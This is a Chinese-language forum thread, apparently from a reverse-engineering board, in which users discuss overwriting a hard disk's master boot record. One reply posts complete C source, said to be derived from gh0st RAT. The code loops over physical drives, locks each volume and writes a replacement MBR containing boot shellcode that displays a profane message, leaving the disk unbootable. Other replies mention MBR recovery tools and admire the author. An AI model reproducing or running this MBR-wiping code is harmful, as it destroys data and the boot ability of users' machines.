能力值:
( LV3,RANK:20 )
|
-
-
2 楼
只不过改个mbr的话没什么大不了的,很多软件都能恢复mbr,diskgen,bootice,当然你要是没准备pe或者第三方系统的话一关机还真麻烦了,你用getlasterror就能看到具体是为什么失败了
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
/*
源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882
2013/7/11 by赫
*/
#include "stdafx.h"
int KillMBR() ;
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x48\x45\x20"
"\x46\x75\x63\x6b\x20\x79\x6f\x75\x0D\x3C\x3C\x3C\x2B\x3E\x3E\x3E";
DWORD Sr = 10;
int _tmain(int argc, _TCHAR* argv[])
{
while(1)
{
if(Sr == 0)
{
Sr = 11;
KillMBR();
}
else if(Sr < 11)
{
Sr--;
KillMBR();
}
else
{
KillMBR();
Sr++;
}
}
return 0;
}
int KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
wchar_t MBR_Path[128] ;
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
StringCchPrintf(MBR_Path,128,_T("\\\\.\\PHYSICALDRIVE%d%c"),Sr,_T('\0'));
hDevice = CreateFile
(
MBR_Path,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
//ExitProcess(-1);
return 0;
}
我自己修改了下程序,不知道有效吗,,,,,
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
3Q,其实是更改成功了,只是显示不正常,我之前没有测试,,
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
很想学习大神的技术
|
能力值:
( LV4,RANK:40 )
|
-
-
6 楼
更改mbr容易,但是构造好的mbr就难了。你不可能就在MBR里面写你的马的代码吧,那肯定是不行的,
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
多谢,前辈指点,努力学习ing
|
|
|
|
